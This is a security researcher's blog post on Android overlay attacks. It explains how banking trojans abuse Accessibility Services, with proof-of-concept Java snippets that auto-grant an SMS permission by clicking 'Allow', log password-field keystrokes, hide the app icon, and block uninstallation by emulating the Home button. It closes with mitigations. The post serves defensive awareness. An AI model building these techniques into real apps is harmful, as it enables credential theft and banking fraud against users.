How are we doing with Android's overlay attacks in 2020?

By Emilian Cebuc on 27 March, 2020

Emilian Cebuc

27 March, 2020


Browsing the Internet, sifting through Android news and security articles (as you normally do on a Saturday afternoon), you come across all sorts of articles. In my case, I stumbled across one describing some 2018 Android malware involving a series of application overlay attacks on the PayPal app. The attackers were somehow able to perform a payment in the app, evading even the SMS 2FA step. While very much aware of clickjacking-style overlay attacks that have plagued the Android platform in the past, this one seemed quite different, apparently making use of some legitimate functionality in Android. I found the topic very interesting, so I decided to delve a bit more into it.

So, overlays…

In the past, overlay attacks would have to exploit bugs in the Android OS code, allowing you to fake benign pop-ups over dangerous ones. This allows us to deceive a victim user into clicking “through” them, performing a specific action (such as accepting a permission). Amar Menezes’s research on the matter is an example of this. However, all this now appears to be possible via a regular Android OS feature.

The information reported in here is not novel per se: these techniques have been already used in the wild by several Android malware variants. However, most of the articles found on security news websites simply report about these attacks, and there’s not much information about how exactly they worked internally. One can find some handpicked snippets of obfuscated code from the reversed-engineered malware, but even if you know Android and Java, you still don’t get a clear picture at all. My aim was to understand how they worked, how much of this is still possible on Android phones in 2020, and raise awareness by trying to recreate the malicious actions, having some actual cleartext/PoC code for people to have a better idea of how they operate.

Looking at a few malware variants

Starting from the specific piece of malware that our client was concerned about, I ended up looking at a whole bunch of different families. These were traced and reported to having been active in the wild from around spring 2018 until the most recent known variants, in December 2019. They would seem to have stemmed from the “Anubis” malware, given that almost perfectly identical code was found in some variants.

These trojans targeted users and operated through techniques which changed and evolved over time. However, the primary aim they all had in common was that of serving as banking trojans. Below is a list collecting the main techniques used by these malware. While there were some smaller versions focused on only one functionality/attack, most variants used a combination of:

  • Basic phishing attempts, masquerading as social networking apps such as WhatsApp, Skype, Google, etc. asking victims to insert their card information to “validate account information”, as can be seen below:
  • Keylogging functionality, similar to the previous attacks, with a fake login page in the attempt to retrieve credentials, again masquerading either as social networking applications, or banking ones
  • Performing overlay actions on legitimate banking applications, attempting payment journeys
  • Using the old trick of over-requesting permissions (particularly SMS) and hoping the victim user would still grant them; this was to either intercept SMS messages (e.g. to read 2FA codes for banking apps), or send SMSs to spread the malware further to the victim’s contacts

Overlay attacks normally consist of a malicious application/user somehow able to perform actions on behalf of the victim. This usually takes the form of an imitation app or a WebView launched “on-top” of a legitimate application (such as a banking app). However, as we’ll see later on, overlays attacks can also consist of actually emulating screen presses over specific windows, buttons, etc., effectively performing a journey (for instance that of completing a payment), without the user really able to act upon it, or sometimes even realise it is happening. It is often possible to notice this “on-top” behaviour of an overlay app, and its presence in the “Recent Apps” drawer right after the legitimate one, as shown below:

As mentioned earlier, the malware variants made use of one, or a combination of the techniques listed above. Most times the application would bypass Google Play Store’s security controls by not actually implementing any malicious code, but later connecting to an attacker’s C2 server after installation. This would then start sending instructions and commands to the trojan, based on what it was intended for.

An example would be the social networking replicas, which would tell the C2 server what social apps the victim had installed on their device (say, WhatsApp), and the C2 server would then send the WhatsApp-looking phishing Activity (Android’s term for a stand-alone UI “page” of an app) to be displayed to the user. Another example would be one of the many versions of the “Ginp” malware, which targeted users of several Spanish banks through the same C2 technique, and WebView overlays. Below are a few screenshots showing two of these bank login pages replicated:

Overlay attacks and Android Accessibility Services

From my research, these trojans seemed to all take advantage of Android’s Accessibility Services (AAS) to some extent, yet most of the time it was only to figure out which app was currently being used by the user, to communicate it to the C2 server. Why limiting to this was still unclear for me.

Which brings us to the star of this research: Android’s Accessibility Services. This is a feature designed to help users with visual, hearing and other types of disabilities. It requires the user to enable it in the Settings, via a single but descriptive pop-up (keep this in mind, it’s essential for later on). Most people have heard about it, and they might know/expect that it might:

  • read aloud text from the screen
  • change some display options (text size, highlighting, colours, layout disposition) to enhance visibility
  • perform voice and gesture recognition

But the more I kept seeing it mentioned, the more it started to reveal itself as an extremely powerful and dangerous feature that would allow space to many more actions than the ones I’ve enlisted above. First of all, since the AAS feature is a service, it meant it could perform actions in the background and only when needed – therefore was less noticeable. Additionally, the various articles I read mentioned:

  • reading the content of TextViews (fair enough, one could extract sensitive info with that)
  • writing into input fields (uh-oh…)
  • block users from accessing pages (like never able to uninstall/stop it anymore?)
  • auto-granting itself additional runtime permissions (BIG uh-oh…), and
  • perform actual gestures on the screen “for you” (swiping, tapping buttons, activating/focusing certain areas on screen, etc.).

You might understand my confusion as someone who was trying to understand how these trojans worked. Why would most malware variants only use AAS to get the app’s package name, and proceed with “traditional” phishing pages, when it seemed you could do so much more? So instead of using a complex setup of multiple elements, (connections to C2 servers, phishing HTML WebViews, pre-crafting them to resemble targeted apps, keylogging implemented into those, etc.) could I create a basic app that would make use of only AAS to do all the major dangerous actions? AAS just seemed “too good to be true” - surely there was no way only one feature could allow you to do all that, right?

And now for the “juicy” stuff

The hardest part was trying to understand the entire way how the AAS feature operates on the system and screen views. While the Google documentation is often well-organized, it can also be really confusing, convoluted or just simply not properly detailed, making life really hard and full of headaches even for more experienced Android programmers. After sifting through all the resources I could find, I decided to create a victim application as well as a “malicious” one, implementing an accessibility service that could:

  • take the user straight to the Accessibility Settings page, and then direct them out of it as soon as they accepted the permission (effectively preventing the user from going back and disabling/uninstalling the app)
  • read and modify the characters in a password-style input field of the victim app
  • request a runtime permission and attempt to automatically grant it, clicking on the “Yes” button

Let’s now step through that implementation by looking at some code :)

First, we implement an Accessibility-enabled service in our application:

public class MyAccessibilityService extends AccessibilityService {

In our app’s manifest file, we have to declare our service, as well as a configuration file for it. This specifies the kind of access we want our service to have, and what actions it should be able to perform. The following is the app’s service declaration in the AndroidManifest.xml file:

<action android:name="android.accessibilityservice.AccessibilityService" />
android:resource="@xml/accessibility_service_config" />

Below is the accessibility_service_config.xml we created for our AAS service:

<accessibility-service xmlns:android=""


Let’s break down what all these values mean:

  • packageNames: this attribute allows us to specify the package names of applications if we want our service to only target those. If absent, all apps present on the device are “in scope”
  • canRetrieveWindowContent: attribute essential to allow the service to retrieve content (such as views) from the active window the user is on
  • canPerformGestures: allows the service to actually perform gestures on behalf of the user
  • accessibilityEventTypes: declares which types of AccessibilityEvents the app is allowed to observe (we’ll get back to these later on). These options are very granular, and were set to see all, for the purpose of debugging and understanding AAS
  • accessibilityFlags: set to include as many types of views as possible, in order to be able to intercept anything we might need. We’ll get back to these as well.

We mentioned how the only requirement for AAS is that they need to be enabled by the user in the settings menu. In the app’s MainActivity (the one marked in the manifest as the LAUNCH activity), it is possible to take the user straight to the Accessibility settings page upon first launch. Luckily, a message can be shown in order to explain why the Accessibility Services are needed, preferably reassuring the user about whatever “innocuous” actions your app will do. Below is a code snippet of how this can be achieved:

// ask user to enable it and take them to the settings page
Toast.makeText(this, "Please enable the accessibility settings " +
"to take advantage of this app's fantastic features", Toast.LENGTH_LONG).show();
Intent openSettingsIntent = new Intent(Settings.ACTION_ACCESSIBILITY_SETTINGS);

The Accessibility settings have significant layout and UI differences depending on the device in question, but in general it will display a list of installed apps which have an Accessibility Service component, including our “AAS Overlays” app. When the user is about to enable it, they will see a pop-up (as can be seen below):  

The pop-up explicitly states what type of permission the app is requesting (i.e. the ones we’ve specified as “true” in the manifest service declaration configuration file). There is no way for an attacker to programmatically accept this request, nor can they manipulate the text fields displaying the permissions descriptions.

However, the user can be further tricked into thinking the displayed permissions are “expected” or “necessary” by carefully choosing a convincing name for the application, which will appear in the pop-up title. So, a fake battery app needing to analyse usage and provide statistics, or something like “Adobe Flash Player” could easily fool someone into thinking that it should be able to read and edit the screen content: 

Once the user has granted this permission, our Accessibility service is started, and the onServiceConnected() method is called. We can override it to include some functionality we want to be executed straight away, such as informing the main thread of execution (perhaps through a broadcast Intent to MainActivity) that the service has indeed been started and therefore the AAS-dependant functionality can now proceed.

Meanwhile, you may want to hide the app’s icon from the App drawer, so the user cannot easily see it and try to uninstall it. You can do this in the MainActivity class:

PackageManager p = getPackageManager();

// activity which is first opened at launch - in manifiest it is declared as
// <category android:name="android.intent.category.LAUNCHER" />
ComponentName componentName = new ComponentName(this,

Alright, so about those window layouts…

Now before we move on, to understand how content on the screen can be manipulated/interacted with, we need to understand a bit about how AAS sees what appears on the screen of a device. There are two main concepts here: Accessibility events, and the parent-children UI layout concept.

AccessibilityEvents are system events triggered when something happens to the content appearing on the screen. These can be of several types, but three are of interest when it comes to views:


While exact definition and extent of each of these types remains unclear, what I was able to figure out was that TYPE_WINDOW_STATE_CHANGED is fired every time there is a complete change in the view, i.e. any time a new Activity has been launched, such as by navigating to a different page in the same app, or switching to a different application.

The TYPE_WINDOW_CONTENT_CHANGED instead is fired every time there’s a modification, of any kind, to what is displayed in the current activity. This should include any key press resulting in a character appearing in an input field, any pop-up, any button clicked, etc. I am certain there is more to it, but for now this is all the information we need.

In terms of layout, the Android system sees every change (read “re-render”) to what is displayed on the screen as a collection of objects, all “children” of the previous node, and a “parent” to the next. The “parent” of all these objects is effectively the entire plain usable layout space in between the notification bar and the bottom of the screen/soft buttons, if available (for any programmers understanding Android, the ConstraintLayout object, which of course contains everything else). Depending on the running Android version, this “allfather” node is called either “source”, or “rootWindow”, is of type AccessibilityNodeInfo, and you get it from the AccessibilityEvent of which I’ve spoken before.

Here is a high-level example:

  • You get an AccessibilityEvent of TYPE_WINDOW_STATE_CHANGED
  • That means most probably the Activity changed
  • If you retrieve the AccessibilityEvent’s source/rootWindow, it will most probably be the general ConstraintLayout of the new activity that appeared
  • This object can now give us information such as what is this new activity’s full name, as well as the package it belongs to
  • This is what AAS uses to determine the current application the user is now on

A second high-level example:

  • You get an AccessibilityEvent of TYPE_WINDOW_CONTENT_CHANGED
  • This means something inside our current activity has changed, maybe we have just typed in one new character into an input field
  • We can get the source/rootWindow from the event, and then we can iterate through all its child node objects, most probably again the ConstraintLayout containing all the other views and fields. The blueprint of an Android activity below will hopefully help with understanding the hierarchy of these layout objects:

Let’s break down this child nodes hierarchy:

  • The ConstraintLayout is everything in between the green title bar with the application title (“AAS-Victim-App”), and the “Back-Home-Recents” software buttons; it contains
  • The container with the static text box and two input fields; of these,
  • The one TextView “area” (pass_view) representing the password input field, and in it
  • The input field itself (i.e. the line with the password hint, on top of which text appears as we type)
  • The actual typed characters inside the field:

We can now see only the last character that has been added.

With the theory out of the way…

…and a better idea about Accessibility events, and parent/children objects, let’s keep going with our “malware” code. The onAccessibilityEvent() method of the service is the one to be overridden when implementing functionality for events. Let’s say we want to just passively gather information about the activities that are opening, so we can start mapping out names. First, we’ll ensure our data gets collected correctly depending on which Android version we’re running:

public void onAccessibilityEvent(AccessibilityEvent accessibilityEvent) {

AccessibilityNodeInfo nodeInfo = accessibilityEvent.getSource();
if(Build.VERSION.SDK_INT >= Build.VERSION_CODES.O && nodeInfo == null) {
nodeInfo = getRootInActiveWindow();

Now we intercept an event of TYPE_WINDOW_STATE_CHANGED, and we save the className (i.e. the Activity full name), if the event concerns the victim application package we’re targeting.

private static final String VICTIM_APP = "com.emilian.aas_victim_app";
private static String currentVictimActivity = "";

if (accessibilityEvent.getEventType() == AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED){
if (accessibilityEvent.getPackageName().toString().equals(VICTIM_APP)) {
currentVictimActivity = accessibilityEvent.getClassName().toString();

Let’s do something severely more dangerous. We’ll request a dangerous-level runtime permission, for example SMS - to be able to intercept 2FA codes (don’t forget to declare it also in the AndroidManifest.xml file). This will be done in our MainActivity class, as permission requests cannot be performed from within a Service:

if (ContextCompat.checkSelfPermission(getApplicationContext(), Manifest.permission.READ_SMS)
!= PackageManager.PERMISSION_GRANTED) {
new String[]{Manifest.permission.READ_SMS},

This will spawn a pop-up for the user, informing them about the application requesting this permission, what it means, and two buttons (“Yes/No”). Back in our service, we want to intercept this pop-up window, and automatically get the AAS to perform a click on the “Yes” button, effectively auto-granting permissions to the application.

This was another one of the trickier parts, because although you might normally think the pop-up would be just an active window content change, turns out that permission pop-ups are considered Activities, and are part of the PackageInstaller class. Also, it was very logical once I found it, but it did take me a while to actually discover the pop-up’s full activity name to filter by (“”). Below is how we intercept the events and filter via the class names we’re interested in:

if (accessibilityEvent.getEventType() == AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED){

if (accessibilityEvent.getPackageName().toString().equals("")
&& accessibilityEvent.getClassName().equals((""))) {
AccessibilityNodeInfo permissionWindowNodeInfo = accessibilityEvent.getSource();

Now, we could iterate through all the various child nodes of permissionWindowNodeInfo, but AAS offers us two methods for doing this, “finding” node objects either by id (if we happened to know it), or by a text query. In our case we could be looking for “Allow” (the word of the button in the pop-up which would grant the permission, if clicked), as can be seen below:

The Logcat output could also be consulted to view the various events that were triggered and captured by the Service. Among these, the pop-up, with its text content visible, assuring us we have the right View object:

16292-16292/com.emilian.aasoverlays I/EVENT_TYPE:: EventType: TYPE_WINDOW_STATE_CHANGED; EventTime: 15618689; PackageName:; MovementGranularity: 0; Action: 0; ContentChangeTypes: []; WindowChangeTypes: [] [ ClassName:; Text: [Allow AAS Overlays to send and view SMS messages?]; ContentDescription: null; ItemCount: -1; CurrentItemIndex: -1; Enabled: true; Password: false; Checked: false; FullScreen: false; Scrollable: false; BeforeText: null; FromIndex: -1; ToIndex: -1; ScrollX: -1; ScrollY: -1; MaxScrollX: -1; MaxScrollY: -1; AddedCount: -1; RemovedCount: -1; ParcelableData: null ]; recordCount: 0

The findAccessibilityNodeInfoByText() or findAccessibilityNodeInfoById() methods return a list of nodes, that might have matched the search query. Now we’d have a much smaller and relevant number of objects to go through. Further filtering can be done by checking for one of the various properties a node object might have. Some of the most useful ones are:

  • isClickable – mostly for buttons, but also text fields
  • isEditable – especially useful to individuate an input text field, together with isClickable
  • isEnabled
  • isPassword – refers to the special type of text fields, where all characters but the last inserted one are replaced by dots

In our case, we look for our clickable button stating “Allow”, and we ask the Accessibility Service to perform a “Click” action on that node. And just like that, this is how we grant ourselves new permissions.

List<AccessibilityNodeInfo> list = permissionWindowNodeInfo.findAccessibilityNodeInfosByText("Allow");
for (AccessibilityNodeInfo node : list) {
if(node.isClickable()) {

Taking advantage of TYPE_WINDOW_CONTENT_CHANGED event, a similar technique could be used to intelligently log every key press on our password input field. This field should keep the characters hidden, however every last one inserted is logged in clear. The code below interacts with this password field, and gets the text present in it for each keypress.

if ((accessibilityEvent.getEventType() ==  AccessibilityEvent.TYPE_WINDOW_CONTENT_CHANGED
|| accessibilityEvent.getEventType() == AccessibilityEvent.TYPE_WINDOW_CONTENT_CHANGED) {
if (accessibilityEvent.getPackageName() != null
&& accessibilityEvent.getPackageName().toString().equals(VICTIM_APP)) {
List<AccessibilityNodeInfo> list;
switch (currentVictimActivity) {
list = nodeInfo.findAccessibilityNodeInfosByViewId(VICTIM_APP + ":id/second_activity_view");
for (AccessibilityNodeInfo node : list) {
Toast.makeText(this, node.getText().toString(), Toast.LENGTH_LONG).show();

This example also shows the usage of findAccessibilityNodeInfosByViewId(). It is obvious that here we require to know the exact resource id (second_activity_view) of the PasswordTextView of our victim application, as well as VICTIM_PRIMARY_ACIVITY. These would most probably require a degree of reverse engineering, or at least passive observation of the application in order to map the names of the various activities and Views of interest. In the screenshot below it is possible to see the Logcat output, with the intercepted characters forming the string “pass” as I was typing it in the victim application:

Finally, the last bit of code I wanted to show is:


which effectively makes AAS emulate pressing the home key, no matter where in the app or in the system I currently am. This is how we can achieve persistence, for instance by preventing users from trying to uninstall the app or manually revoke permissions we’ve auto-granted ourselves. Using one of the techniques shown before, we can code the application to “sense” when the user enters the app’s page in the settings. In this page we’d normally find the permissions menu, as well as the “uninstall” and “force stop” buttons. Therefore, we can simply emulate pressing the “Back” or “Home” buttons, effectively disallowing them from ever being able to perform any of those actions.


So yes, as we’ve seen, we only need to fool a victim into accepting one permission, and from that moment on we can do everything else programmatically. We can:

  • read text from the screen (such as user sensitive information)
  • passively keylog anything they type in, allowing us to harvest credentials, banking apps passcodes, 2FA codes inserted (for example from card readers), etc.
  • fill in any input form, which would allow us to use the previously gathered information to log into the legitimate apps – no need to create phishing pages anymore
  • perform full journeys by pressing on buttons
  • auto-granting runtime permissions, widening the range of further attack avenues significantly (intercepting and sending SMSs, spreading to the victim contacts’ devices, reading logs, setting default apps, even install other applications if the device happens to be rooted, prevent removal, and much more).

Of course, all this requires the attacker to study very well the apps they’re targeting. If the malicious developer learns enough about the targeted app, they could have an initial phase of purely passive analysis, simply enumerating and logging names of packages, activities and input fields of interest, as well as passively keylogging everything the user does, stealing credentials, banking app passphrases, and other sensitive information. Phase two would then focus on programmatically crafting the right overlay clicks, form auto-insertions (using the stolen credentials) and effectively complete login flows, money transfer attempts, etc.

Nevertheless, it turns out all my initial “fears” revealed to be valid. During these tests I was running Android 9, on a Galaxy S8. It looks like these attacks are still very much possible in March 2020. Android’s Accessibility Services proved to be an incredible feature that can put a lot of power in the hands of a malicious user. Once surpassed the big obstacle of understanding the ways and inner workings of AAS, the potential for damage is incredibly high. What I have shown are the most essential building blocks for creating one hell of a malicious app. The video below gives a taste of how fast the runtime permission auto-granting action happens, bringing the user straight back to the home screen:


You can see something quickly flickering on your screen, but you wouldn’t be able to tell much. And even if you did, not only you’d not really have much time to stop it, I suspect it is probably quite clear by now that there would be ways to easily make that process repeat indefinitely until the app has all the permissions it wants.

As I previously mentioned, the majority of the trojans I’ve read about did not seem to make use of the entire “arsenal” that AAS would allow access to. The only piece of malware I found that did was “Ginp”, and more specifically the latest variants of it, which apparently were based on the same source code as the relatively older “Anubis” malware. The PayPal trojan also used the gesture and touches emulation, together with the text field autocompletion, to quickly insert the attacker’s email to the list of payees and proceed through the app’s activities and executing a transfer. It waited for the user to login on the legitimate app, receive an OTP code, type that in, and once the logon was complete, the malware would do the rest in a split-second. With the code I’ve shown in here, a malicious app wouldn’t even need to wait for the user to login: it could steal their credentials and proceed to login by itself.

Potential remediations

From what I could see, precisely because of the high level of privilege that AAS has by design, there isn’t much that developers can do in order to protect their applications, as this is something that is part of the Android OS itself, and only Google can come up with solutions/mitigation's to this.

One remediation, particularly for banking apps, is forcing a user to head on to the web application if they want to add a completely new payee. That way, the mobile app could not be used for this purpose (PayPal did not enforce this, and that’s exactly what the attacks relied on).

Another idea would be to have a separate window for the payment confirmation, with a timer. This is to make it very clear to the user that a payment is about to be made. Only a “Cancel payment” button should be present. The counter-solution here could be the existence of some other AAS methods which might effectively allow changing the layout depth of a view. I was not able to try them myself yet, but if they are capable of that, then malware could “grab” the confirmation pop-up, and simply hide it “behind” the banking app. The timer could still pass, and the payment will go through.

The only “counter-counter-solution” to that approach would be any Android APIs that might force this payment to only go through if the confirmation page has something like a “TASK_ON_TOP” property active all the time. As soon as AAS would try to hide it, this property would not be true anymore, the payment automatically getting cancelled.

Bottom line is, banks in particular as well as any other developers, should definitely be aware of these attacks, because as we’ve proven, they are very much still possible.

What is Google doing about it? Well, it was announced in 2019 that there they were deprecating the overlay functionality of AAS in Android Q (10). Furthermore, they also added a limitation which apparently automatically revokes the accessibility permission if it is requested after 30 seconds. However, it would appear that if the malicious app requests permissions (and the victim grants them) immediately after launch (as it was in the case of my POC), then this remediation is still quite useless.

All devices which will not receive the update, are going to remain vulnerable indefinitely. As Android 10 is currently the latest release, i.e. it has the absolute lowest userbase for now (no official figures yet, but safe to assume <10%), this is a real problem.